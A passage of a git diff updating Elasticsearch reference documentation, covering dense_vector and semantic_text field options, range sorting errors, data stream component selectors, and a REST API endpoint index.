Defaults to `Math.max(1, Math.min(4, <> / 2))` which works well for a good solid-state-disk (SSD). If your index is on spinning platter drives instead, decrease this to 1. + +`indices.merge.disk.check_interval` +: The time interval for checking the available disk space. Defaults to `5s`. + +`indices.merge.disk.watermark.high` +: Controls the disk usage watermark, which defaults to `95%`, beyond which no merge tasks can start execution. +The disk usage tally includes the estimated temporary disk space still required by all the currently executing merge tasks. +Any merge task scheduled *before* the limit is reached continues execution, even if the limit is exceeded while executing +(merge tasks are not aborted). + +`indices.merge.disk.watermark.high.max_headroom` +: Controls the max headroom for the merge disk usage watermark, when it is specified as a percentage or ratio value. +Defaults to `100GB` when `indices.merge.disk.watermark.high` is not explicitly set. +This caps the amount of free disk space that is required before merge scheduling is blocked. diff --git a/docs/reference/elasticsearch/index.md b/docs/reference/elasticsearch/index.md index a2060ee9c384c..18b308999471e 100644 --- a/docs/reference/elasticsearch/index.md +++ b/docs/reference/elasticsearch/index.md @@ -1,14 +1,65 @@ -# Elasticsearch and index management +# Elasticsearch -This section contains reference information for {{es}} and index management features. +{{es}} is a distributed search and analytics engine, scalable data store, and vector database built on Apache Lucene. It’s optimized for speed and relevance on production-scale workloads. Use Elasticsearch to search, index, store, and analyze data of all shapes and sizes in near real time. -To learn more about {{es}} features and how to get started, refer to the [{{es}}](docs-content://solutions/search.md) documentation.
+## Quick links -For more details about query and scripting languages, check these sections: -* [Query languages](../query-languages/index.md) -* [Scripting languages](../scripting-languages/index.md) - -{{es}} also provides the following REST APIs: +:::{dropdown} Useful links -* [{{es}} API](https://www.elastic.co/docs/api/doc/elasticsearch) -* [{{es}} Serverless API](https://www.elastic.co/docs/api/doc/elasticsearch-serverless) \ No newline at end of file +- [REST API Reference](./rest-apis/index.md) +- [API Conventions](./rest-apis/api-conventions.md) +- [Settings Reference](https://www.elastic.co/guide/en/elasticsearch/reference/current/settings.html) +- [Breaking Changes](https://www.elastic.co/guide/en/elasticsearch/reference/current/breaking-changes.html) +- [Compatibility](./rest-apis/compatibility.md) +- [Glossary](https://www.elastic.co/guide/en/elasticsearch/reference/current/glossary.html) +- [Plugin Development](https://www.elastic.co/guide/en/elasticsearch/plugins/current/index.html) +- [Supported Platforms](https://www.elastic.co/support/matrix#matrix_jvm) +::: + +## Setup and architecture + +- [Set up Elasticsearch](docs-content://deploy-manage/deploy/self-managed/installing-elasticsearch.md) +- [Secure the Elastic Stack](docs-content://deploy-manage/security.md) +- [Upgrade Elasticsearch](docs-content://deploy-manage/upgrade/deployment-or-cluster.md) +- [Set up a cluster for high availability](docs-content://deploy-manage/tools.md) +- [Stack monitoring](docs-content://deploy-manage/monitor/stack-monitoring.md) +- [Troubleshooting](docs-content://troubleshoot/elasticsearch.md) +- [Optimizations](docs-content://deploy-manage/production-guidance/optimize-performance.md) + +## Working with data + +- [Adding data to Elasticsearch](docs-content://manage-data/ingest.md) +- [Connectors](https://www.elastic.co/docs/reference/search-connectors) +- [Web crawler](https://www.elastic.co/search-labs/blog/elastic-open-crawler-release) +- [Data streams](docs-content://manage-data/data-store/data-streams.md) +- [Ingest pipelines](docs-content://manage-data/ingest/transform-enrich/ingest-pipelines.md) +- [Mapping](docs-content://manage-data/data-store/mapping.md) +- [Data management](docs-content://manage-data/lifecycle.md) +- [Downsampling](docs-content://manage-data/lifecycle.md) +- [Snapshot and restore](docs-content://deploy-manage/tools/snapshot-and-restore.md) + +## Search and analytics + +{{es}} is the search and analytics engine that powers the {{stack}}. 
+ +- [Get started](docs-content://get-started/index.md) +- [Learn how to search your data](docs-content://solutions/search/querying-for-search.md) +- Query data programmatically: use query languages to run advanced search, filtering, or analytics + - [Query DSL](docs-content://explore-analyze/query-filter/languages/querydsl.md): full JSON-based query language + - [ES|QL](/reference/query-languages/esql.md): fast, SQL-like language with piped syntax + - [EQL](docs-content://explore-analyze/query-filter/languages/eql.md): for event-based time series data, such as logs, metrics, and traces + - [SQL](docs-content://explore-analyze/query-filter/languages/sql.md): SQL-style queries on Elasticsearch data +- [Search applications](docs-content://solutions/search/search-applications.md) +- [Aggregations](docs-content://explore-analyze/query-filter/aggregations.md) +- [Geospatial analysis](docs-content://explore-analyze/geospatial-analysis.md) +- [Machine Learning](docs-content://explore-analyze/machine-learning.md) +- [Alerting](docs-content://explore-analyze/alerts-cases.md) + +## APIs and developer docs + +- [REST APIs](https://www.elastic.co/docs/reference/elasticsearch/rest-apis) +- [{{es}} Clients](https://www.elastic.co/docs/reference/elasticsearch-clients) +- [Painless](https://www.elastic.co/docs/reference/scripting-languages/painless/painless) +- [Plugins and integrations](https://www.elastic.co/docs/reference/elasticsearch/plugins) +- [Search Labs](https://www.elastic.co/search-labs) +- [Notebook examples](https://www.elastic.co/search-labs/tutorials/examples) diff --git a/docs/reference/elasticsearch/mapping-reference/dense-vector.md b/docs/reference/elasticsearch/mapping-reference/dense-vector.md index 7f3a701bde3f8..eb9b7be9738c7 100644 --- a/docs/reference/elasticsearch/mapping-reference/dense-vector.md +++ b/docs/reference/elasticsearch/mapping-reference/dense-vector.md @@ -55,7 +55,14 @@ In many cases, a brute-force kNN search is not efficient enough. For this reason Unmapped array fields of float elements with size between 128 and 4096 are dynamically mapped as `dense_vector` with a default similarity of `cosine`. You can override the default similarity by explicitly mapping the field as `dense_vector` with the desired similarity. -Indexing is enabled by default for dense vector fields and indexed as `bbq_hnsw` if dimensions are greater than or equal to 384, otherwise they are indexed as `int8_hnsw`. When indexing is enabled, you can define the vector similarity to use in kNN search: +Indexing is enabled by default for dense vector fields and indexed as `bbq_hnsw` if dimensions are greater than or equal to 384, otherwise they are indexed as `int8_hnsw`. {applies_to}`stack: ga 9.1` + +:::{note} +In {{stack}} 9.0, dense vector fields are always indexed as `int8_hnsw`.
+::: + Quantized vectors can use [oversampling and rescoring](docs-content://solutions/search/vector/knn.md#dense-vector-knn-search-rescoring) to improve accuracy on approximate kNN search results. ::::{note} @@ -223,7 +234,7 @@ $$$dense-vector-similarity$$$ `l2_norm` : Computes similarity based on the L2 distance (also known as Euclidean distance) between the vectors. The document `_score` is computed as `1 / (1 + l2_norm(query, vector)^2)`. -For `bit` vectors, instead of using `l2_norm`, the `hamming` distance between the vectors is used. The `_score` transformation is `(numBits - hamming(a, b)) / numBits` + For `bit` vectors, instead of using `l2_norm`, the `hamming` distance between the vectors is used. The `_score` transformation is `(numBits - hamming(a, b)) / numBits` `dot_product` : Computes the dot product of two unit vectors. This option provides an optimized way to perform cosine similarity. The constraints and computed score are defined by `element_type`. @@ -255,9 +266,14 @@ $$$dense-vector-index-options$$$ `type` : (Required, string) The type of kNN algorithm to use. Can be any of: * `hnsw` - This utilizes the [HNSW algorithm](https://arxiv.org/abs/1603.09320) for scalable approximate kNN search. This supports all `element_type` values. - * `int8_hnsw` - The default index type for float vectors with less than 384 dimensions. This utilizes the [HNSW algorithm](https://arxiv.org/abs/1603.09320) in addition to automatically scalar quantization for scalable approximate kNN search with `element_type` of `float`. This can reduce the memory footprint by 4x at the cost of some accuracy. See [Automatically quantize vectors for kNN search](#dense-vector-quantization). + * `int8_hnsw` - The default index type for some float vectors: + * {applies_to}`stack: ga 9.1` Default for float vectors with less than 384 dimensions. + * {applies_to}`stack: ga 9.0` Default for all float vectors. + This utilizes the [HNSW algorithm](https://arxiv.org/abs/1603.09320) in addition to automatic scalar quantization for scalable approximate kNN search with `element_type` of `float`. This can reduce the memory footprint by 4x at the cost of some accuracy. See [Automatically quantize vectors for kNN search](#dense-vector-quantization). * `int4_hnsw` - This utilizes the [HNSW algorithm](https://arxiv.org/abs/1603.09320) in addition to automatic scalar quantization for scalable approximate kNN search with `element_type` of `float`. This can reduce the memory footprint by 8x at the cost of some accuracy. See [Automatically quantize vectors for kNN search](#dense-vector-quantization). - * `bbq_hnsw` - The default index type for float vectors with greater than or equal to 384 dimensions. This utilizes the [HNSW algorithm](https://arxiv.org/abs/1603.09320) in addition to automatically binary quantization for scalable approximate kNN search with `element_type` of `float`. This can reduce the memory footprint by 32x at the cost of accuracy. See [Automatically quantize vectors for kNN search](#dense-vector-quantization). + * `bbq_hnsw` - This utilizes the [HNSW algorithm](https://arxiv.org/abs/1603.09320) in addition to automatic binary quantization for scalable approximate kNN search with `element_type` of `float`. This can reduce the memory footprint by 32x at the cost of accuracy. See [Automatically quantize vectors for kNN search](#dense-vector-quantization). + + {applies_to}`stack: ga 9.1` `bbq_hnsw` is the default index type for float vectors with greater than or equal to 384 dimensions.
* `flat` - This utilizes a brute-force search algorithm for exact kNN search. This supports all `element_type` values. * `int8_flat` - This utilizes a brute-force search algorithm in addition to automatically scalar quantization. Only supports `element_type` of `float`. * `int4_flat` - This utilizes a brute-force search algorithm in addition to automatically half-byte scalar quantization. Only supports `element_type` of `float`. @@ -272,25 +288,24 @@ $$$dense-vector-index-options$$$ `confidence_interval` : (Optional, float) Only applicable to `int8_hnsw`, `int4_hnsw`, `int8_flat`, and `int4_flat` index types. The confidence interval to use when quantizing the vectors. Can be any value between and including `0.90` and `1.0` or exactly `0`. When the value is `0`, this indicates that dynamic quantiles should be calculated for optimized quantization. When between `0.90` and `1.0`, this value restricts the values used when calculating the quantization thresholds. For example, a value of `0.95` will only use the middle 95% of the values when calculating the quantization thresholds (e.g. the highest and lowest 2.5% of values will be ignored). Defaults to `1/(dims + 1)` for `int8` quantized vectors and `0` for `int4` for dynamic quantile calculation. - -`rescore_vector` +`rescore_vector` {applies_to}`stack: preview 9.0, ga 9.1` : (Optional, object) An optional section that configures automatic vector rescoring on knn queries for the given field. Only applicable to quantized index types. :::::{dropdown} Properties of rescore_vector `oversample` -: (required, float) The amount to oversample the search results by. This value should be greater than `1.0` and less than `10.0` or exactly `0` to indicate no oversampling & rescoring should occur. The higher the value, the more vectors will be gathered and rescored with the raw values per shard. +: (required, float) The amount to oversample the search results by. This value should be one of the following: + * Greater than `1.0` and less than `10.0` + * Exactly `0` to indicate no oversampling and rescoring should occur {applies_to}`stack: ga 9.1` + : The higher the value, the more vectors will be gathered and rescored with the raw values per shard. : In case a knn query specifies a `rescore_vector` parameter, the query `rescore_vector` parameter will be used instead. : See [oversampling and rescoring quantized vectors](docs-content://solutions/search/vector/knn.md#dense-vector-knn-search-rescoring) for details. ::::: :::: - - ## Synthetic `_source` [dense-vector-synthetic-source] `dense_vector` fields support [synthetic `_source`](/reference/elasticsearch/mapping-reference/mapping-source-field.md#synthetic-source) . - -## Indexing & Searching bit vectors [dense-vector-index-bit] +## Indexing and searching bit vectors [dense-vector-index-bit] When using `element_type: bit`, this will treat all vectors as bit vectors. Bit vectors utilize only a single bit per dimension and are internally encoded as bytes. This can be useful for very high-dimensional vectors or models. @@ -333,7 +348,6 @@ PUT my-bit-vectors 1. The number of dimensions that represents the number of bits - ```console POST /my-bit-vectors/_bulk?refresh {"index": {"_id" : "1"}} @@ -345,7 +359,6 @@ POST /my-bit-vectors/_bulk?refresh 1. 5 bytes representing the 40 bit dimensioned vector 2. 
A hexadecimal string representing the 40 bit dimensioned vector - Then, when searching, you can use the `knn` query to search for similar bit vectors: ```console POST /my-bit-vectors/_search?filter_path=hits.hits @@ -391,14 +404,22 @@ POST /my-bit-vectors/_search?filter_path=hits.hits } ``` - ## Updatable field type [_updatable_field_type] To better accommodate scaling and performance needs, updating the `type` setting in `index_options` is possible with the [Update Mapping API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping), according to the following graph (jumps allowed): +::::{tab-set} +:::{tab-item} {{stack}} 9.1+ ```txt flat --> int8_flat --> int4_flat --> bbq_flat --> hnsw --> int8_hnsw --> int4_hnsw --> bbq_hnsw ``` +::: +:::{tab-item} {{stack}} 9.0 +```txt +flat --> int8_flat --> int4_flat --> hnsw --> int8_hnsw --> int4_hnsw +``` +::: +:::: For updating all HNSW types (`hnsw`, `int8_hnsw`, `int4_hnsw`, `bbq_hnsw`) the number of connections `m` must either stay the same or increase. For the scalar quantized formats `int8_flat`, `int4_flat`, `int8_hnsw` and `int4_hnsw` the `confidence_interval` must always be consistent (once defined, it cannot change). @@ -447,5 +468,3 @@ Vectors indexed before this change will keep using the `flat` type (raw float32 In order to have all the vectors updated to the new type, either reindexing or force merging should be used. For debugging purposes, it’s possible to inspect how many segments (and docs) exist for each `type` with the [Index Segments API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-segments). - - diff --git a/docs/reference/elasticsearch/mapping-reference/mapping-source-field.md b/docs/reference/elasticsearch/mapping-reference/mapping-source-field.md index 931909d1cb371..2ee3c6b025141 100644 --- a/docs/reference/elasticsearch/mapping-reference/mapping-source-field.md +++ b/docs/reference/elasticsearch/mapping-reference/mapping-source-field.md @@ -14,7 +14,11 @@ If disk usage is important to you, then consider the following options: ## Synthetic `_source` [synthetic-source] -Though very handy to have around, the source field takes up a significant amount of space on disk. Instead of storing source documents on disk exactly as you send them, Elasticsearch can reconstruct source content on the fly upon retrieval. To enable this [subscription](https://www.elastic.co/subscriptions) feature, use the value `synthetic` for the index setting `index.mapping.source.mode`: +:::{note} +This feature requires a [subscription](https://www.elastic.co/subscriptions). +::: + +Though very handy to have around, the source field takes up a significant amount of space on disk. Instead of storing source documents on disk exactly as you send them, Elasticsearch can reconstruct source content on the fly upon retrieval. To enable this feature, use the value `synthetic` for the index setting `index.mapping.source.mode`: $$$enable-synthetic-source-example$$$ @@ -305,13 +309,12 @@ PUT my-index-000001 } ``` -::::{admonition} Think before disabling the _source field -:class: warning +::::{warning} -Users often disable the `_source` field without thinking about the consequences, and then live to regret it. If the `_source` field isn’t available then a number of features are not supported: +Do not disable the `_source` field unless absolutely necessary.
If you disable it, the following critical features will not be supported: * The [`update`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-update), [`update_by_query`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-update-by-query), and [`reindex`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-reindex) APIs. -* In the {{kib}} [Discover](docs-content://explore-analyze/discover.md) application, field data will not be displayed. +* Display of field data in the {{kib}} [Discover](docs-content://explore-analyze/discover.md) application. * On the fly [highlighting](/reference/elasticsearch/rest-apis/highlighting.md). * The ability to reindex from one Elasticsearch index to another, either to change mappings or analysis, or to upgrade an index to a new major version. * The ability to debug queries or aggregations by viewing the original document used at index time. diff --git a/docs/reference/elasticsearch/mapping-reference/range.md b/docs/reference/elasticsearch/mapping-reference/range.md index 95a573222292b..b11edc7e4102c 100644 --- a/docs/reference/elasticsearch/mapping-reference/range.md +++ b/docs/reference/elasticsearch/mapping-reference/range.md @@ -215,6 +215,70 @@ The following parameters are accepted by range types: [`store`](/reference/elasticsearch/mapping-reference/mapping-store.md) : Whether the field value should be stored and retrievable separately from the [`_source`](/reference/elasticsearch/mapping-reference/mapping-source-field.md) field. Accepts `true` or `false` (default). +## Sorting + +Sorting is not supported for any of the `range` field types. Attempting to sort by a field of type range_field will result in a `400 Bad Request` response. +For example, executing a sort query on a field of type `integer_range`, +```console +PUT idx +{ + "mappings": { + "properties": { + "my_range": { + "type": "integer_range" + } + } + } +} + +POST idx/_search +{ + "sort": [ + { + "my_range": { + "order": "asc" + } + } + ] +} +``` +results in the following response: +```console-result +{ + "error": { + "root_cause": [ + { + "type": "illegal_argument_exception", + "reason": "Sorting by range field [my_range] is not supported" + } + ], + "type": "search_phase_execution_exception", + "reason": "all shards failed", + "phase": "query", + "grouped": true, + "failed_shards": [ + { + "shard": 0, + "index": "idx", + "node": "7pzVSCf5TuSNZYj-N7u3tw", + "reason": { + "type": "illegal_argument_exception", + "reason": "Sorting by range field [my_range] is not supported" + } + } + ], + "caused_by": { + "type": "illegal_argument_exception", + "reason": "Sorting by range field [my_range] is not supported", + "caused_by": { + "type": "illegal_argument_exception", + "reason": "Sorting by range field [my_range] is not supported" + } + } + }, + "status": 400 +} +``` ## Synthetic `_source` [range-synthetic-source] diff --git a/docs/reference/elasticsearch/mapping-reference/semantic-text.md b/docs/reference/elasticsearch/mapping-reference/semantic-text.md index 06ea9cc9156e3..d426207ce3873 100644 --- a/docs/reference/elasticsearch/mapping-reference/semantic-text.md +++ b/docs/reference/elasticsearch/mapping-reference/semantic-text.md @@ -2,6 +2,9 @@ navigation_title: "Semantic text" mapped_pages: - https://www.elastic.co/guide/en/elasticsearch/reference/current/semantic-text.html +applies_to: + stack: ga 9.0 + serverless: ga --- # Semantic text field type [semantic-text] @@ -29,9 +32,10 @@ service. 
Using `semantic_text`, you won’t need to specify how to generate embeddings for your data, or how to index it. The {{infer}} endpoint automatically determines the embedding generation, indexing, and query to use. -Newly created indices with `semantic_text` fields using dense embeddings will be + +{applies_to}`stack: ga 9.1` Newly created indices with `semantic_text` fields using dense embeddings will be [quantized](/reference/elasticsearch/mapping-reference/dense-vector.md#dense-vector-quantization) -to `bbq_hnsw` automatically. +to `bbq_hnsw` automatically as long as they have at least 64 dimensions. If you use the preconfigured `.elser-2-elasticsearch` endpoint, you can set up `semantic_text` with the following API request: @@ -111,13 +115,13 @@ the [Create {{infer}} API](https://www.elastic.co/docs/api/doc/elasticsearch/ope to create the endpoint. If not specified, the {{infer}} endpoint defined by `inference_id` will be used at both index and query time. -`index_options` +`index_options` {applies_to}`stack: ga 9.1` : (Optional, object) Specifies the index options to override default values for the field. Currently, `dense_vector` index options are supported. For text embeddings, `index_options` may match any allowed [dense_vector index options](/reference/elasticsearch/mapping-reference/dense-vector.md#dense-vector-index-options). -`chunking_settings` +`chunking_settings` {applies_to}`stack: ga 9.1` : (Optional, object) Settings for chunking text into smaller passages. If specified, these will override the chunking settings set in the {{infer-cap}} endpoint associated with `inference_id`. @@ -127,8 +131,8 @@ To completely disable chunking, use the `none` chunking strategy. **Valid values for `chunking_settings`**: - `type` - : Indicates the type of chunking strategy to use. Valid values are `none`, `word` or + `strategy` + : Indicates the chunking strategy to use. Valid values are `none`, `word` or `sentence`. Required. `max_chunk_size` @@ -144,7 +148,8 @@ To completely disable chunking, use the `none` chunking strategy. or `1`. Required for `sentence` type chunking settings ::::{warning} -When using the `none` chunking strategy, if the input exceeds the maximum token limit of the underlying model, some +When using the `none` chunking strategy, if the input exceeds the maximum token +limit of the underlying model, some services (such as OpenAI) may return an error. In contrast, the `elastic` and `elasticsearch` services will automatically truncate the input to fit within the @@ -181,6 +186,15 @@ For more details on chunking and how to configure chunking settings, see [Configuring chunking](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-inference) in the Inference API documentation. +Refer +to [this tutorial](docs-content://solutions/search/semantic-search/semantic-search-semantic-text.md) +to learn more about semantic search using `semantic_text`. + +### Pre-chunking [pre-chunking] +```{applies_to} +stack: ga 9.1 +``` + You can pre-chunk the input by sending it to Elasticsearch as an array of strings. Example: @@ -227,11 +241,7 @@ PUT test-index/_doc/1 * Others (such as `elastic` and `elasticsearch`) will automatically truncate the input. -Refer -to [this tutorial](docs-content://solutions/search/semantic-search/semantic-search-semantic-text.md) -to learn more about semantic search using `semantic_text`.
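Tying the chunking options above together, here is a minimal sketch of a mapping that overrides the endpoint-level chunking at the field level (the index name, field name, and size values are illustrative, not required defaults):

```console
PUT my-chunked-index
{
  "mappings": {
    "properties": {
      "my_semantic_field": {
        "type": "semantic_text",
        "inference_id": ".elser-2-elasticsearch",
        "chunking_settings": {
          "strategy": "sentence",
          "max_chunk_size": 250,
          "sentence_overlap": 1
        }
      }
    }
  }
}
```

Documents indexed into `my_semantic_field` would then be chunked by sentence with these settings instead of the chunking configured on the {{infer}} endpoint.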
- -## Extracting Relevant Fragments from Semantic Text [semantic-text-highlighting] +## Extracting relevant fragments from semantic text [semantic-text-highlighting] You can extract the most relevant fragments from a semantic text field by using the [highlight parameter](/reference/elasticsearch/rest-apis/highlighting.md) in @@ -257,9 +267,30 @@ POST test-index/_search ``` 1. Specifies the maximum number of fragments to return. -2. Sorts highlighted fragments by score when set to `score`. By default, +2. Sorts the most relevant highlighted fragments by score when set to `score`. By default, fragments will be output in the order they appear in the field (order: none). +To use the `semantic` highlighter to view chunks in the order in which they were indexed, without scoring, +use the `match_all` query to retrieve them in the order they appear in the document: + +```console +POST test-index/_search +{ + "query": { + "match_all": {} + }, + "highlight": { + "fields": { + "my_semantic_field": { + "number_of_fragments": 5 <1> + } + } + } +} +``` + +1. This will return the first 5 chunks; set this number higher to retrieve more chunks. + Highlighting is supported on fields other than semantic_text. However, if you want to restrict highlighting to the semantic highlighter and return no fragments when the field is not of type semantic_text, you can explicitly @@ -294,9 +325,14 @@ specified. It enables you to quickstart your semantic search by providing automatic {{infer}} and a dedicated query so you don’t need to provide further details. +### Customizing using `semantic_text` parameters [custom-by-parameters] +```{applies_to} +stack: ga 9.1 +``` + If you want to override those defaults and customize the embeddings that -`semantic_text` indexes, you can do so by modifying <>: +`semantic_text` indexes, you can do so by +modifying [parameters](#semantic-text-params): - Use `index_options` to specify alternate index options such as specific `dense_vector` quantization methods @@ -327,6 +363,24 @@ PUT my-index-000004 } ``` +### Customizing using ingest pipelines [custom-by-pipelines] +```{applies_to} +stack: ga 9.0 +``` + +If you want to customize data indexing, use the +[`sparse_vector`](/reference/elasticsearch/mapping-reference/sparse-vector.md) +or [`dense_vector`](/reference/elasticsearch/mapping-reference/dense-vector.md) +field types and create an ingest pipeline with an +[{{infer}} processor](/reference/enrich-processor/inference-processor.md) to +generate the embeddings. +[This tutorial](docs-content://solutions/search/semantic-search/semantic-search-inference.md) +walks you through the process. In these cases, when you use `sparse_vector` or +`dense_vector` field types instead of the `semantic_text` field type to +customize indexing, the +[`semantic_query`](/reference/query-languages/query-dsl/query-dsl-semantic-query.md) +is not supported for querying the field data. ## Updates to `semantic_text` fields [update-script] For indices containing `semantic_text` fields, updates that use scripts have the @@ -391,6 +445,29 @@ PUT test-index } ``` +## Troubleshooting semantic_text fields [troubleshooting-semantic-text-fields] + +If you want to verify that your embeddings look correct, you can view the +inference data that `semantic_text` typically hides by using the `fields` option. + +```console +POST test-index/_search +{ + "query": { + "match": { + "my_semantic_field": "Which country is Paris in?"
+ } + }, + "fields": [ + "_inference_fields" + ] +} +``` + +This will return the verbose chunked embedding content that is used to perform +semantic search for `semantic_text` fields. + + ## Limitations [limitations] `semantic_text` field types have the following limitations: @@ -398,6 +475,6 @@ PUT test-index * `semantic_text` fields are not currently supported as elements of [nested fields](/reference/elasticsearch/mapping-reference/nested.md). * `semantic_text` fields can’t currently be set as part - of [Dynamic templates](docs-content://manage-data/data-store/mapping/dynamic-templates.md). + of [dynamic templates](docs-content://manage-data/data-store/mapping/dynamic-templates.md). * `semantic_text` fields are not supported with Cross-Cluster Search (CCS) or Cross-Cluster Replication (CCR). diff --git a/docs/reference/elasticsearch/mapping-reference/sparse-vector.md b/docs/reference/elasticsearch/mapping-reference/sparse-vector.md index 98d2edc097575..79d5f4bbe53c7 100644 --- a/docs/reference/elasticsearch/mapping-reference/sparse-vector.md +++ b/docs/reference/elasticsearch/mapping-reference/sparse-vector.md @@ -26,7 +26,7 @@ PUT my-index ## Token pruning ```{applies_to} -stack: preview 9.1 +stack: ga 9.1 ``` For any newly created indices, token pruning will be turned on by default with appropriate defaults. You can control this behaviour using the optional `index_options` parameters for the field: @@ -63,23 +63,23 @@ The following parameters are accepted by `sparse_vector` fields: * Exclude the field from [_source](/reference/elasticsearch/rest-apis/retrieve-selected-fields.md#source-filtering). * Use [synthetic `_source`](/reference/elasticsearch/mapping-reference/mapping-source-field.md#synthetic-source). -index_options {applies_to}`stack: preview 9.1` +index_options {applies_to}`stack: ga 9.1` : (Optional, object) You can set index options for your `sparse_vector` field to determine if you should prune tokens, and the parameter configurations for the token pruning. If pruning options are not set in your [`sparse_vector` query](/reference/query-languages/query-dsl/query-dsl-sparse-vector-query.md), Elasticsearch will use the default options configured for the field, if any. Parameters for `index_options` are: -`prune` {applies_to}`stack: preview 9.1` +`prune` {applies_to}`stack: ga 9.1` : (Optional, boolean) Whether to perform pruning, omitting the non-significant tokens from the query to improve query performance. If `prune` is true but the `pruning_config` is not specified, pruning will occur but default values will be used. Default: true. -`pruning_config` {applies_to}`stack: preview 9.1` +`pruning_config` {applies_to}`stack: ga 9.1` : (Optional, object) Optional pruning configuration. If enabled, this will omit non-significant tokens from the query in order to improve query performance. This is only used if `prune` is set to `true`. If `prune` is set to `true` but `pruning_config` is not specified, default values will be used. If `prune` is set to false but `pruning_config` is specified, an exception will occur. Parameters for `pruning_config` include: - `tokens_freq_ratio_threshold` {applies_to}`stack: preview 9.1` + `tokens_freq_ratio_threshold` {applies_to}`stack: ga 9.1` : (Optional, integer) Tokens whose frequency is more than `tokens_freq_ratio_threshold` times the average frequency of all tokens in the specified field are considered outliers and pruned. This value must be between 1 and 100. Default: `5`.
- `tokens_weight_threshold` {applies_to}`stack: preview 9.1` + `tokens_weight_threshold` {applies_to}`stack: ga 9.1` : (Optional, float) Tokens whose weight is less than `tokens_weight_threshold` are considered insignificant and pruned. This value must be between 0 and 1. Default: `0.4`. ::::{note} diff --git a/docs/reference/elasticsearch/rest-apis/api-conventions.md b/docs/reference/elasticsearch/rest-apis/api-conventions.md index 574e96e03ac98..bd688868b65f5 100644 --- a/docs/reference/elasticsearch/rest-apis/api-conventions.md +++ b/docs/reference/elasticsearch/rest-apis/api-conventions.md @@ -421,6 +421,39 @@ GET /_nodes/ra*:2 GET /_nodes/ra*:2* ``` +### Component selectors [api-component-selectors] + +A data stream component is a logical grouping of indices that helps organize data inside a data stream. All data streams contain a `data` component by default. The `data` component comprises the data stream's backing indices. When searching, managing, or indexing into a data stream, the `data` component is what you are interacting with by default. + +Some data stream features are exposed as additional components alongside the `data` component. These other components consist of separate sets of backing indices that store supplemental data, independent of the data stream's regular backing indices. An example of another component is the `failures` component exposed by the data stream [failure store](docs-content://manage-data/data-store/data-streams/failure-store.md) feature, which captures documents that fail ingestion in a separate set of backing indices on the data stream. + +Some APIs that accept an `<index>`, `<data-stream>`, or `<target>` request path parameter also support *selector syntax*, which defines which component of a data stream the API should operate on. To use a selector, append it to the index or data stream name. Selectors can be combined with other index pattern syntax like [date math](#api-date-math-index-names) and wildcards. + +There are currently two selector suffixes supported by {{es}} APIs: + +`::data` +: Refers to a data stream's backing indices containing regular data. Data streams always contain a `data` component. + +`::failures` +: Refers to the internal indices used for a data stream's [failure store](docs-content://manage-data/data-store/data-streams/failure-store.md). + +As an example, the [search]({{es-apis}}group/endpoint-search), [field capabilities]({{es-apis}}operation/operation-field-caps), and [index stats]({{es-apis}}operation/operation-indices-stats) APIs can all report results from a component other than the default `data` component. + +```console +# Search a data stream normally +GET my-data-stream/_search +# Search a data stream's failure data if present +GET my-data-stream::failures/_search + +# Syntax can be combined with other index pattern syntax (wildcards, multi-target, date math, cross cluster search, etc) +GET logs-*::failures/_search +GET logs-*::data,logs-*::failures/_count +GET remote-cluster:logs-*-*::failures/_search +GET *::data,*::failures,-logs-rdbms-*::failures/_stats +GET ::failures/_search +``` + + ## Parameters [api-conventions-parameters] Rest parameters (when using HTTP, map to HTTP URL parameters) follow the convention of using underscore casing.
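For example, both query parameters in the following request use underscore casing (the specific values shown are just illustrative):

```console
GET /_cluster/health?wait_for_status=yellow&timeout=30s
```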
@@ -583,4 +616,3 @@ If one of these quantities is large we’ll print it out like 10m for 10,000,000 `p` : Peta - diff --git a/docs/reference/elasticsearch/rest-apis/highlighting.md b/docs/reference/elasticsearch/rest-apis/highlighting.md index 93f58eeb6f14e..bbebb8202f506 100644 --- a/docs/reference/elasticsearch/rest-apis/highlighting.md +++ b/docs/reference/elasticsearch/rest-apis/highlighting.md @@ -7,7 +7,7 @@ applies_to: # Highlighting [highlighting] -Highlighters enable you to get highlighted snippets from one or more fields in your search results so you can show users where the query matches are. When you request highlights, the response contains an additional `highlight` element for each search hit that includes the highlighted fields and the highlighted fragments. +Highlighters enable you to retrieve the best-matching highlighted snippets from one or more fields in your search results so you can show users where the query matches are. When you request highlights, the response contains an additional `highlight` element for each search hit that includes the highlighted fields and the highlighted fragments. ::::{note} Highlighters don’t reflect the boolean logic of a query when extracting terms to highlight. Thus, for some complex boolean queries (e.g nested boolean queries, queries using `minimum_should_match` etc.), parts of documents may be highlighted that don’t correspond to query matches. diff --git a/docs/reference/elasticsearch/rest-apis/index.md b/docs/reference/elasticsearch/rest-apis/index.md index e3dd8f9897986..871666cc99209 100644 --- a/docs/reference/elasticsearch/rest-apis/index.md +++ b/docs/reference/elasticsearch/rest-apis/index.md @@ -16,3 +16,667 @@ This section includes: - [Common options](/reference/elasticsearch/rest-apis/common-options.md) - [Compatibility](/reference/elasticsearch/rest-apis/compatibility.md) - [Examples](/reference/elasticsearch/rest-apis/api-examples.md) + +## API endpoints + +### [Autoscaling](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-autoscaling) + +The autoscaling APIs enable you to create and manage autoscaling policies and retrieve information about autoscaling capacity. Autoscaling adjusts resources based on demand. A deployment can use autoscaling to scale resources as needed, ensuring sufficient capacity to meet workload requirements. + +| API | Description | +| --- | ----------- | +| [Get Autoscaling Policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-autoscaling-get-autoscaling-policy) | Retrieves a specific autoscaling policy. | +| [Create or update an autoscaling policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-autoscaling-put-autoscaling-policy) | Creates or updates an autoscaling policy. | +| [Delete Autoscaling Policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-autoscaling-delete-autoscaling-policy) | Deletes an existing autoscaling policy. | +| [Get Autoscaling Capacity](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-autoscaling-get-autoscaling-capacity) | Estimates autoscaling capacity for current cluster state. | + +### [Behavioral analytics](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-analytics) + +```{applies_to} +stack: deprecated +``` + +The behavioral analytics APIs enable you to create and manage analytics collections and 